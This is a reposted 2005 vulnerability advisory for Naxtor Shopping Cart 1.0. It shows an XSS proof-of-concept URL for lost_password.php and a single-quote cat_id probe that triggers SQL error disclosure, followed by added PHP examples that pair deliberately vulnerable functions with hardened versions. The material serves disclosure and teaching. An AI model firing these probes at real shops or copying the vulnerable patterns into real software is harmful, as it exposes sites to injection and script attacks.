[Repost] Naxtor Shopping Cart lost_password.php: multiple vulnerabilities and tests

Author: JohnC@NoBytes.com

Hello All,
I have discovered a couple of remote vulnerabilities in Naxtor Shopping Cart 1.0.
Authors Site: http://www.naxtor.com.au/
Naxtor is described by its authors as:

Naxtor Shopping Cart is a one-stop solution for companies interested in
selling merchandise online.

+-[Examples:]--------------------------------------------------+

[1]------------------------------------------------------------+

XSS:

http://www.victim.com/lost_passo ... r%20xss=31337;alert(xss);</script>&reset=reset

[2]------------------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victim.com/shop_display_products.php?cat_id='



Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/navigation.php on line 13

Warning: mysql_numrows(): supplied argument is not a valid MySQL result
resource in /var/www/html/shop_display_products.php on line 180

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result
resource in /var/www/html/shop_display_products.php on line 181
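The warnings above are the tell: a single quote in cat_id makes the SQL statement invalid, mysql_query() returns false, and the later mysql_fetch_array()/mysql_numrows() calls complain about that false value. Because display_errors is on, the server also leaks its filesystem layout (/var/www/html/...). The following is an added example, not Naxtor's code and not from the advisory: it reconstructs both bug classes as minimal vulnerable patterns next to hardened ones. The table and column names, the "user" parameter and attribute context assumed for lost_password.php, the $conn/$pdo handles and the exact query shape are all assumptions.

```php
<?php
// Added example (not Naxtor's code): the two bug classes the advisory reports,
// each reconstructed as a minimal vulnerable pattern next to a hardened one.
// Table/column names, the "user" parameter of lost_password.php, the $conn
// and $pdo handles and the query shape are all assumptions.

/* [1] Reflected XSS in a lost-password form */

// Vulnerable: the submitted value is echoed into the HTML unencoded, so a
// value like  "><script>alert(1)</script>  closes the attribute and runs.
function lost_password_form_vulnerable(array $get)
{
    $user = isset($get['user']) ? $get['user'] : '';
    return '<input type="text" name="user" value="' . $user . '">';
}

// Hardened: encode on output; ENT_QUOTES covers both ' and " so the value
// cannot break out of the attribute whichever quote style wraps it.
function lost_password_form_safe(array $get)
{
    $raw  = isset($get['user']) ? $get['user'] : '';
    $user = htmlspecialchars($raw, ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="user" value="' . $user . '">';
}

/* [2] SQL injection and error disclosure via cat_id */

// Vulnerable (PHP 5 / ext/mysql era, as the advisory's warnings suggest):
// cat_id is interpolated straight into the query. cat_id=' makes the SQL
// invalid, mysql_query() returns false, and the following calls on that
// false value raise exactly the "supplied argument is not a valid MySQL
// result resource" warnings. With display_errors on, the warnings (and the
// server's filesystem paths) are sent to the browser.
function display_products_vulnerable($conn, array $get)
{
    $cat_id = isset($get['cat_id']) ? $get['cat_id'] : '';
    $sql    = "SELECT * FROM products WHERE cat_id = $cat_id"; // no quoting, no escaping
    $result = mysql_query($sql, $conn);                        // false on a syntax error
    $count  = mysql_numrows($result);                          // warning: not a valid result resource
    while ($row = mysql_fetch_array($result)) {                // same warning again
        echo $row['name'], "\n";
    }
    return $count;
}

// Hardened: reject anything that is not an integer, bind the value in a
// prepared statement, and keep driver errors out of the response
// (set PDO::ATTR_ERRMODE to PDO::ERRMODE_EXCEPTION and catch/log at the top level).
function display_products_safe(PDO $pdo, array $get)
{
    $cat_id = filter_var(isset($get['cat_id']) ? $get['cat_id'] : null, FILTER_VALIDATE_INT);
    if ($cat_id === false) {
        http_response_code(400);
        return array();
    }
    $stmt = $pdo->prepare('SELECT id, name FROM products WHERE cat_id = :cat_id');
    $stmt->execute(array(':cat_id' => $cat_id));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Deployment side of the disclosure: in production php.ini keep display_errors
// off and log instead, so a failed query never reveals paths such as
// /var/www/html/shop_display_products.php to the client:
//   display_errors = Off
//   log_errors     = On
```

The integer check in display_products_safe() is what removes the "possible" from "possible SQL injection": a category id can only ever be a number, so the parameter is rejected before it reaches the driver, and the prepared statement handles any value the validator lets through. The mysql_* calls are kept only to mirror the 2005-era code; that extension was removed in PHP 7.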


+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 15/06/2005
Author(s) Informed on: 16/06/2005
Author(s) Response: NONE
Author(s) Fix: NONE
